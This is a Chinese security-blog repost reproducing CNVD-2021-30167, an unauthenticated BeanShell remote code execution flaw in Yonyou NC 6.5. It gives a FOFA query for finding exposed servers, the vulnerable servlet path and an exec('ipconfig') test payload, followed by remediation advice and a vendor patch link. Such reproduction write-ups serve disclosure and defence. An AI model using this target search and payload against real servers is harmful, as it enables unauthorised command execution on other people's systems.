CNVD-2021-30167 用友NCBeanShell远程代码执行漏洞复现

admin 2022年6月2日07:55:49安全文章评论16 views654字阅读2分10秒阅读模式

漏洞描述

该漏洞是由于用友NC对外开放了BeanShell测试接口,并没有设置权限,攻击者可利用该漏洞在未授权的情况下,构造恶意数据,执行任意代码,最终获取服务器最高权限。

用友NC 6是用友NC产品的全新系列、是面向集团企业的世界级高端管理软件。目前NC基于8000家集团企业客户的实力,使其在同类产品市场占有率已经达到亚太第一,面向大型企业集团和成长中的集团企业的信息化需求,用友NC6的产品定位于大型企业管理与电子商务平台。

漏洞验证

FOFA搜索规则:

icon_hash="1085941792"

访问页面如下:

CNVD-2021-30167 用友NCBeanShell远程代码执行漏洞复现

访问造成远程命令执行的漏洞URL:

http://*.*.*.*/servlet/~ic/bsh.servlet.BshServlet

CNVD-2021-30167 用友NCBeanShell远程代码执行漏洞复现

写入执行命令测试语句:

exec("ipconfig");

CNVD-2021-30167 用友NCBeanShell远程代码执行漏洞复现

影响范围

目前受影响的用友NC版本:

用友NC 6.5

安全建议

1.禁止开放BeanShell访问接口

2.对BeanShell接口添加授权认证机制

用友NC官方说明:该漏洞为第三方jar包漏洞导致,用友NC官方已于4月9日解决并验证,且通过服务渠道推送了解决方案,授权用户可以访问下载链接进行下载。

下载链接:

http://umc.yonyou.com/ump/querypatchdetailedmng?PK=18981c7af483007db179a236016f594d37c01f22aa5f5d19


原文始发于微信公众号(赛瑞攻防实验室):CNVD-2021-30167 用友NCBeanShell远程代码执行漏洞复现

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年6月2日07:55:49
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  CNVD-2021-30167 用友NCBeanShell远程代码执行漏洞复现 http://cn-sec.com/archives/887232.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: